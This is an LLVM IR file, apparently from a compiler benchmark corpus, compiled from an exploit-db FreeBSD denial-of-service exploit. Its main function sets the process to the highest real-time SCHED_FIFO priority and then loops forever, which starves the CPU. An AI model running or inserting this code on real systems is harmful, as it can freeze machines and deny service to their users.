; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/freebsd/dos/extr_28812.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/freebsd/dos/extr_28812.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.sched_param = type { i32 }

@SCHED_FIFO = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main() #0 {
  %1 = alloca i32, align 4
  %2 = alloca %struct.sched_param, align 4
  store i32 0, i32* %1, align 4
  %3 = load i32, i32* @SCHED_FIFO, align 4
  %4 = call i32 @sched_get_priority_max(i32 %3)
  %5 = getelementptr inbounds %struct.sched_param, %struct.sched_param* %2, i32 0, i32 0
  store i32 %4, i32* %5, align 4
  %6 = load i32, i32* @SCHED_FIFO, align 4
  %7 = call i32 @sched_setscheduler(i32 0, i32 %6, %struct.sched_param* %2)
  br label %8

8:                                                ; preds = %8, %0
  br label %8
}

declare dso_local i32 @sched_get_priority_max(i32) #1

declare dso_local i32 @sched_setscheduler(i32, i32, %struct.sched_param*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
